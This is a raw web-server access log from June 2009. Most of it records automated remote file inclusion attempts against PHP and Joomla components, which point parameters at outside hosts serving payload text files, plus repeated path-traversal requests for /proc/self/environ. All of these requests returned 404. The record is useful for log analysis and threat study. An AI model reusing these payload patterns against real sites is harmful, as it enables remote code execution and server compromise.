217.147.30.80 - - [12/Jun/2009:00:26:14 -0400] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://208.98.22.241/id.txt?%0D?? HTTP/1.1" 404 246 "-" "libwww-perl/5.79"
217.147.30.80 - - [12/Jun/2009:00:26:15 -0400] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://208.98.22.241/id.txt?%0D?? HTTP/1.1" 404 251 "-" "libwww-perl/5.79"
217.147.30.80 - - [12/Jun/2009:00:26:59 -0400] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jun/2009:00:26:59 -0400] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
89.111.0.66 - - [12/Jun/2009:00:27:44 -0400] "GET /logs/access_log.Q109052400/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=../../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
89.111.0.66 - - [12/Jun/2009:00:27:44 -0400] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=../../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
89.111.0.66 - - [12/Jun/2009:00:27:44 -0400] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=../../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jun/2009:00:28:01 -0400] "GET /logs/error_log.Q109051800//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://208.98.22.241/id.txt?%0D?? HTTP/1.1" 404 272 "-" "libwww-perl/5.79"
89.111.0.66 - - [12/Jun/2009:00:28:12 -0400] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=../../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
89.111.0.66 - - [12/Jun/2009:00:28:12 -0400] "GET /logs/access_log.Q109052400%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=../../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
89.111.0.66 - - [12/Jun/2009:00:28:12 -0400] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=../../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
89.111.0.66 - - [12/Jun/2009:00:28:13 -0400] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=../../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
89.111.0.66 - - [12/Jun/2009:00:28:13 -0400] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=../../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
89.111.0.66 - - [12/Jun/2009:00:28:13 -0400] "GET /logs/access_log.Q109051600/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=../../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jun/2009:00:28:30 -0400] "GET /logs/error_log.Q109051800//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://208.98.22.241/id.txt?%0D?? HTTP/1.1" 404 272 "-" "libwww-perl/5.79"
217.125.38.117 - - [12/Jun/2009:00:28:32 -0400] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
217.125.38.117 - - [12/Jun/2009:00:28:32 -0400] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
87.106.135.14 - - [12/Jun/2009:00:28:42 -0400] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
87.106.135.14 - - [12/Jun/2009:00:28:42 -0400] "GET /logs/access_log.Q109050300%20%20//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
87.106.135.14 - - [12/Jun/2009:00:28:42 -0400] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
74.54.32.201 - - [12/Jun/2009:00:28:44 -0400] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
74.54.32.201 - - [12/Jun/2009:00:28:44 -0400] "GET /logs/access_log.Q109050300%20%20//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
74.54.32.201 - - [12/Jun/2009:00:28:44 -0400] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
66.249.71.14 - - [12/Jun/2009:00:28:48 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L006559449971D500D0CE01I+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
89.111.0.66 - - [12/Jun/2009:00:28:51 -0400] "GET /logs/access_log.Q109051700/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=../../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
74.54.32.201 - - [12/Jun/2009:00:28:53 -0400] "GET /logs/access_log.Q109052900%20%20//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
87.106.135.14 - - [12/Jun/2009:00:28:54 -0400] "GET /logs/access_log.Q109052900%20%20//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
89.111.0.66 - - [12/Jun/2009:00:29:06 -0400] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=../../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
89.111.0.66 - - [12/Jun/2009:00:29:06 -0400] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=../../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
89.111.0.66 - - [12/Jun/2009:00:29:06 -0400] "GET /logs/access_log.Q109051600/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=../../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
110.45.144.89 - - [12/Jun/2009:00:29:26 -0400] "GET /logs/access_log.Q109051100//include/write.php?dir=http://www.yorkza.com/fs1/io/it2.jpg??? HTTP/1.1" 404 243 "-" "libwww-perl/5.79"
110.45.144.89 - - [12/Jun/2009:00:29:26 -0400] "GET //include/write.php?dir=http://www.yorkza.com/fs1/io/it2.jpg??? HTTP/1.1" 404 216 "-" "libwww-perl/5.79"
110.45.144.89 - - [12/Jun/2009:00:29:27 -0400] "GET /logs//include/write.php?dir=http://www.yorkza.com/fs1/io/it2.jpg??? HTTP/1.1" 404 221 "-" "libwww-perl/5.79"
110.45.144.33 - - [12/Jun/2009:00:29:52 -0400] "GET /logs/access_log.Q109051100//include/write.php?dir=http://www.yorkza.com/fs1/io/it2.jpg??? HTTP/1.1" 404 243 "-" "libwww-perl/5.79"
110.45.144.33 - - [12/Jun/2009:00:29:52 -0400] "GET //include/write.php?dir=http://www.yorkza.com/fs1/io/it2.jpg??? HTTP/1.1" 404 216 "-" "libwww-perl/5.79"
110.45.144.33 - - [12/Jun/2009:00:29:53 -0400] "GET /logs//include/write.php?dir=http://www.yorkza.com/fs1/io/it2.jpg??? HTTP/1.1" 404 221 "-" "libwww-perl/5.79"
209.59.12.99 - - [12/Jun/2009:00:30:07 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
78.46.68.17 - - [12/Jun/2009:00:30:38 -0400] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
78.46.68.17 - - [12/Jun/2009:00:30:38 -0400] "GET /logs/access_log.Q109050300%20%20//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
78.46.68.17 - - [12/Jun/2009:00:30:39 -0400] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
78.46.68.17 - - [12/Jun/2009:00:30:56 -0400] "GET /logs/access_log.Q109052900%20%20//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
12.68.140.202 - - [12/Jun/2009:00:31:06 -0400] "GET /logs/access_log.Q109060500//index.php?_SERVER[DOCUMENT_ROOT]=http://208.98.22.241/id.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.820"
12.68.140.202 - - [12/Jun/2009:00:31:10 -0400] "GET //index.php?_SERVER[DOCUMENT_ROOT]=http://208.98.22.241/id.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.820"
12.68.140.202 - - [12/Jun/2009:00:31:11 -0400] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://208.98.22.241/id.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.820"
12.68.140.202 - - [12/Jun/2009:00:31:13 -0400] "GET //index.php?_SERVER[DOCUMENT_ROOT]=http://208.98.22.241/id.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.820"
12.68.140.202 - - [12/Jun/2009:00:31:13 -0400] "GET //index.php?_SERVER[DOCUMENT_ROOT]=http://208.98.22.241/id.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.820"
12.68.140.202 - - [12/Jun/2009:00:31:14 -0400] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://208.98.22.241/id.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.820"
12.68.140.202 - - [12/Jun/2009:00:31:14 -0400] "GET /logs/access_log.Q109060500//index.php?_SERVER[DOCUMENT_ROOT]=http://208.98.22.241/id.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.820"
12.68.140.202 - - [12/Jun/2009:00:31:15 -0400] "GET /logs/access_log.Q109060500//index.php?_SERVER[DOCUMENT_ROOT]=http://208.98.22.241/id.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.820"
12.68.140.202 - - [12/Jun/2009:00:31:15 -0400] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://208.98.22.241/id.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.820"
89.111.0.66 - - [12/Jun/2009:00:31:31 -0400] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=../../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
89.111.0.66 - - [12/Jun/2009:00:31:32 -0400] "GET /logs/access_log.Q109051700%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=../../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
89.111.0.66 - - [12/Jun/2009:00:31:32 -0400] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=../../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
84.201.208.50 - - [12/Jun/2009:00:31:32 -0400] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
84.201.208.50 - - [12/Jun/2009:00:31:32 -0400] "GET /logs/access_log.Q109050300%20%20//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
84.201.208.50 - - [12/Jun/2009:00:31:33 -0400] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
84.201.208.50 - - [12/Jun/2009:00:31:40 -0400] "GET /logs/access_log.Q109052900%20%20//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
74.54.32.201 - - [12/Jun/2009:00:31:48 -0400] "GET /logs/access_log.Q109050300//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
74.54.32.201 - - [12/Jun/2009:00:31:48 -0400] "GET /logs/access_log.Q109052900//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
87.106.135.14 - - [12/Jun/2009:00:31:52 -0400] "GET /logs/access_log.Q109050300//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
87.106.135.14 - - [12/Jun/2009:00:31:52 -0400] "GET /logs/access_log.Q109052900//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
89.111.0.66 - - [12/Jun/2009:00:32:47 -0400] "GET /logs/access_log.Q109051600%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=../../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
89.111.0.66 - - [12/Jun/2009:00:32:52 -0400] "GET /logs/access_log.Q109051700%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=../../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
89.111.0.66 - - [12/Jun/2009:00:33:11 -0400] "GET /logs/access_log.Q109051600%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=../../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
89.111.0.66 - - [12/Jun/2009:00:33:39 -0400] "GET /logs/access_log.Q109052200%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=../../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
218.249.36.194 - - [12/Jun/2009:00:34:07 -0400] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
218.249.36.194 - - [12/Jun/2009:00:34:07 -0400] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
89.111.0.66 - - [12/Jun/2009:00:34:24 -0400] "GET /logs/access_log.Q109051700%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=../../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
75.145.152.113 - - [12/Jun/2009:00:34:27 -0400] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.socawaremme.com//img/fx29id1.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
75.145.152.113 - - [12/Jun/2009:00:34:28 -0400] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.socawaremme.com//img/fx29id1.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
75.145.152.113 - - [12/Jun/2009:00:34:28 -0400] "GET /logs/access_log.Q109051800//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.socawaremme.com//img/fx29id1.txt??? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Jun/2009:00:35:08 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
74.54.32.201 - - [12/Jun/2009:00:35:09 -0400] "GET //bookmark4u/lostpasswd.php?env[include_prefix]=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
74.54.32.201 - - [12/Jun/2009:00:35:09 -0400] "GET /logs/access_log.Q109060500%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
74.54.32.201 - - [12/Jun/2009:00:35:09 -0400] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
97.97.105.66 - - [12/Jun/2009:00:35:22 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
97.97.105.66 - - [12/Jun/2009:00:35:22 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
97.97.105.66 - - [12/Jun/2009:00:35:23 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
97.97.105.66 - - [12/Jun/2009:00:35:23 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
78.46.68.17 - - [12/Jun/2009:00:35:28 -0400] "GET /logs/access_log.Q109050300//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
78.46.68.17 - - [12/Jun/2009:00:35:28 -0400] "GET /logs/access_log.Q109052900//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
84.201.208.50 - - [12/Jun/2009:00:35:34 -0400] "GET /logs/access_log.Q109050300//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
74.54.32.201 - - [12/Jun/2009:00:35:59 -0400] "GET /logs/access_log.Q109052900%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
78.46.68.17 - - [12/Jun/2009:00:36:17 -0400] "GET //bookmark4u/lostpasswd.php?env[include_prefix]=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
78.46.68.17 - - [12/Jun/2009:00:36:17 -0400] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
78.46.68.17 - - [12/Jun/2009:00:36:17 -0400] "GET /logs/access_log.Q109060500%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
84.201.208.50 - - [12/Jun/2009:00:36:21 -0400] "GET /logs/access_log.Q109052900//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
211.189.18.73 - - [12/Jun/2009:00:36:41 -0400] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://harvestusa.org///administrator//components/id1.txt??? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
211.189.18.73 - - [12/Jun/2009:00:36:41 -0400] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://harvestusa.org///administrator//components/id1.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
211.189.18.73 - - [12/Jun/2009:00:36:41 -0400] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://harvestusa.org///administrator//components/id1.txt??? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
211.189.18.73 - - [12/Jun/2009:00:36:41 -0400] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://harvestusa.org///administrator//components/id1.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
84.201.208.50 - - [12/Jun/2009:00:36:51 -0400] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
84.201.208.50 - - [12/Jun/2009:00:36:51 -0400] "GET //bookmark4u/lostpasswd.php?env[include_prefix]=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
84.201.208.50 - - [12/Jun/2009:00:36:51 -0400] "GET /logs/access_log.Q109060500%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
92.53.104.33 - - [12/Jun/2009:00:37:39 -0400] "GET /logs//index.php?page=http://adresik.info//components/com_agora/test.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
92.53.104.33 - - [12/Jun/2009:00:37:39 -0400] "GET //index.php?page=http://adresik.info//components/com_agora/test.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
87.106.135.14 - - [12/Jun/2009:00:37:43 -0400] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
87.106.135.14 - - [12/Jun/2009:00:37:43 -0400] "GET //bookmark4u/lostpasswd.php?env[include_prefix]=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
87.106.135.14 - - [12/Jun/2009:00:37:50 -0400] "GET /logs/access_log.Q109060500%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
75.145.152.113 - - [12/Jun/2009:00:38:04 -0400] "GET /logs/access_log.Q109051800%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.socawaremme.com//img/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
76.164.212.18 - - [12/Jun/2009:00:38:15 -0400] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
76.164.212.18 - - [12/Jun/2009:00:38:15 -0400] "GET /logs/access_log.Q109060800/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
76.164.212.18 - - [12/Jun/2009:00:38:15 -0400] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
78.46.68.17 - - [12/Jun/2009:00:38:17 -0400] "GET /logs/access_log.Q109052900%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
84.201.208.50 - - [12/Jun/2009:00:38:29 -0400] "GET /logs/access_log.Q109052900%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
74.54.32.201 - - [12/Jun/2009:00:38:42 -0400] "GET /logs/access_log.Q109060500//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
89.111.0.66 - - [12/Jun/2009:00:38:49 -0400] "GET /logs/access_log.Q109051600/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=../../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
74.54.32.201 - - [12/Jun/2009:00:39:05 -0400] "GET /logs/access_log.Q109052900//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
89.111.0.66 - - [12/Jun/2009:00:39:11 -0400] "GET /logs/access_log.Q109051700/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=../../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
187.25.80.250 - - [12/Jun/2009:00:39:17 -0400] "GET /logs/access_log.Q109052800//include/bbs.lib.inc.php?site_path=http://typh0n.awardspace.co.uk/id.txt???? HTTP/1.1" 404 249 "-" "libwww-perl/5.820"
187.25.80.250 - - [12/Jun/2009:00:39:19 -0400] "GET //include/bbs.lib.inc.php?site_path=http://typh0n.awardspace.co.uk/id.txt???? HTTP/1.1" 404 222 "-" "libwww-perl/5.820"
187.25.80.250 - - [12/Jun/2009:00:39:19 -0400] "GET /logs//include/bbs.lib.inc.php?site_path=http://typh0n.awardspace.co.uk/id.txt???? HTTP/1.1" 404 227 "-" "libwww-perl/5.820"
87.106.135.14 - - [12/Jun/2009:00:39:24 -0400] "GET /logs/access_log.Q109052900%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
76.164.212.18 - - [12/Jun/2009:00:39:44 -0400] "GET /logs/access_log.Q109060800%20%20/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
